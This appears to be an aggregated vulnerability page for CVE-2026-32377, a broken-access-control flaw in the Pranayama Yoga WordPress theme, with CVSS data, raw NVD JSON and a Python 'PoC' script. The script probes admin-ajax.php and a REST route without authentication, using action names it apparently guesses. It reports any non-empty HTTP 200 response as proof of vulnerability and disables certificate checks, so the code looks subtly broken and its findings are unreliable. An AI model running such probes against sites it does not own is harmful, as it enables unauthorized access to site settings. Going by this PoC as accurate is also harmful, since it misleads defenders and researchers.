Security Vulnerability Report
中文
CVE-2026-32377 CVSS 5.3 MEDIUM

CVE-2026-32377

Published: 2026-03-13 19:54:52
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in raratheme Pranayama Yoga pranayama-yoga allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Pranayama Yoga: from n/a through <= 1.2.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Pranayama Yoga <= 1.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32377 PoC - Pranayama Yoga Theme Broken Access Control # Target: WordPress site with Pranayama Yoga theme <= 1.2.2 # Type: Missing Authorization / Broken Access Control import requests import sys TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """Check if target is vulnerable to CVE-2026-32377""" # Common Pranayama Yoga AJAX actions that might be unprotected vulnerable_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/pranayama-yoga/v1/" ] # Try to access theme options or settings without authentication test_payloads = [ { "action": "pranayama_yoga_get_options", "method": "POST" }, { "action": "pranayama_yoga_save_settings", "method": "POST" }, { "endpoint": "/wp-json/pranayama-yoga/v1/settings", "method": "GET" } ] print(f"[*] Testing target: {TARGET_URL}") print(f"[*] CVE-2026-32377 - Pranayama Yoga Broken Access Control\n") for endpoint in vulnerable_endpoints: for payload in test_payloads: try: if payload.get("method") == "POST": data = {"action": payload["action"]} response = requests.post(endpoint, data=data, timeout=10, verify=False) else: response = requests.get(endpoint, timeout=10, verify=False) # Check if response indicates successful unauthorized access if response.status_code == 200 and len(response.text) > 0: print(f"[+] VULNERABLE: {endpoint} - {payload.get('action', payload.get('endpoint'))}") print(f" Status: {response.status_code}") print(f" Response length: {len(response.text)} bytes") return True except Exception as e: print(f"[-] Error testing {endpoint}: {str(e)}") print("[-] Target may not be vulnerable or endpoint not found") return False if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32377", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:52.457", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Pranayama Yoga pranayama-yoga allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Pranayama Yoga: from n/a through <= 1.2.2."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en raratheme Pranayama Yoga pranayama-yoga permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Pranayama Yoga: desde n/a hasta &lt;= 1.2.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/pranayama-yoga/vulnerability/wordpress-pranayama-yoga-theme-1-2-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}